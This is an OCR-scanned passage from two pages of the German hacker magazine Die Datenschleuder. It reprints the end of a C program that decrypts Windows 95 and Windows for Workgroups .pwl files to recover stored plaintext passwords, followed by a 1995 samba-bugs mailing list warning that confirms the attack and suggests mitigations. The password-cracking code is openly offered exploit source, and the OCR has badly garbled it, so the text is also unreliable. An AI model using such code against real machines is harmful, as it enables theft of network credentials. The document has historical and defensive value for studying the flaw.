Seite 14	Ausgabe 54

cracked=size-OxO208;
if(crackedcO) cracked=O;
if(cracked>1000) cracked=1000;
memcpy(keystream,Data+Ox208,cracked );

/* generate 20 bytes of keystream */
for(i=O;ic20;i++) (
ch=toupper(nameti]);
if(ch=O) break;
if(ch_'.') break;
keystreamlilA=ch;

);
cracked=20;

/* find allocated resources ./

sizemask-keystream[O]+(keystream[1 ]cc8);
printf(~S~zemask: %04X\n",sizemask);

}

for(i=O;ic256; i++) Rall[i]=O;

maxr-O,
for(i-Ox108;kOx208;i++) (
if(Data[i]l=Oxtf) ~
Rall[Data[i]]++;
if (Data~i]>maxr) maxr=Data[i];

	maxr=(((maxr/16)+1)~16); /* resource pointertable size appears
to be divisible by 16 ./

/* search after resources */

Rpoint[0]=OxO208+2�maxr+20+2; /* first resource ./
for(i-O;i<maxr;i++) ~
w find size ot current resource */
pos-Rpoint[i];
rsz=Data[pos]+(Datalpos+1 ]cc8);
rsz^=sizemask;
printf("Analyzing block with size:
%04x\t(%d:%d)\n", rsz, I, Rall[i]);
if( (Rall[i]==O) && (rszl=O) )

}

printf("unused resource has nonzero size !!I\n");
exit(O);

pos+=rsz;

~tc ~hicn~c~k~er - Das wissenschaftliche Fachblatt fUr Datenreisende

Aus~abe 54
v

Seite 15

1. Resources have a tendency to have the wrong size for some reason */
check for correct size W/
if(lcmaxr-1 ) ~
while(Data[pos+3]!=keystreaml1]) {
prinff(~:(%O2X).,Dala[pos+3]);
pos+=3D2; /. very rude may tail */
}

pos+=2; /* include pointer in size �l
Rpointpl+1 ]=pos;

Rpoint[maxr]-size;
w insert Table data inlo keystream */
for(i=O;i <= maxr;i++) ~
keystrearn[20+2*ip=Rpdnt[i] & OxOOff;
keystream[21+2�ll~(Rpoint[i] >> 8) & OxOOff;

cracked+=maxr.2+2:

	It means that anyone with access to a
WfWg or Win95 box that has been used
to login to a samba (or NT or OS12 etc)
server can take the .pwl files off the PC
and use them to get valid passwords on
the server.

	Note that this is not directly a secur ty
hole in samba. Its a huge security hole in
the way WfWg and Win95 store their pas-
swords on disk. It equally affects

networks which use NT and OS/2 server.
It also affects people who just use other
WfWg and Win95 machines as servers.
pfinff("%d bytes of keyslream recovererl\n~,cracked); Also, if your WfWg and Win95 systems
/* decrypt resouroes */

for(i=O;i c maxr;i++) {
rsz=Rpointli+1 ]-Rpoint[il;

if (rsz>cracked) rsz=cracked;
pfinff("Resource[�/Odl (�/Od)\n~,i,rsz);
forU=o;lcrsz;i++) =

prlnff(''%c~,Dala[Rpoint[il+jl~keystream[j]);
pfinff(~\n~);

exit(0);

}

- --- end ---

From: samba-bugs@anu.edu.au

Subject: win95 and WfWg .pwl files
cracked

Date: Tue, 5 Dec 1995 23:11:52 +1100

	1 have just tried Frank Stevensons program
for cracking .pwl files. It indeed works.

	With it I could obtain the plain text
passwords from a Windows95 .pwl file or a
windows for workgroups .pwl fHe in less than
a second. I tried it on 3 different files. A11
were successtully decrypted.

This is very bad.

have not been patched to avoid the "cd
.1" bug and you export any shares then
anyone who can attach to those shares
can obtain your .pwl files. It doesn't mat-
ter what directory you are exporting.

What can you do about this?

	Well, if you don't care about security
then just do nothing :-)

Otherwise.

	First of all, change your router rules to
disable tcpl39, udpl37 and udpl38 from
entering your network from the Internet.

	Secondly, disable your WfWG and
Win95 boxes from saving passwords on
disk when connecting to SMB servers.
Can someone please post clear
instructions on exactly how to do this?
(preferably with how to make it
permanent)

	Thirdly, delete all the .pwl f~les on your
WfWG and Win95 boxes.

	Theres probably more you should do. I
only found out about this decryption pro-
gram a few minutes a~o. I imagine more
advice will be forthcoming from other
people on this list.

Andrew

~k ~stal~lolItr - Das wissenschaftliche Fachblatt f�r Datenreisende.

l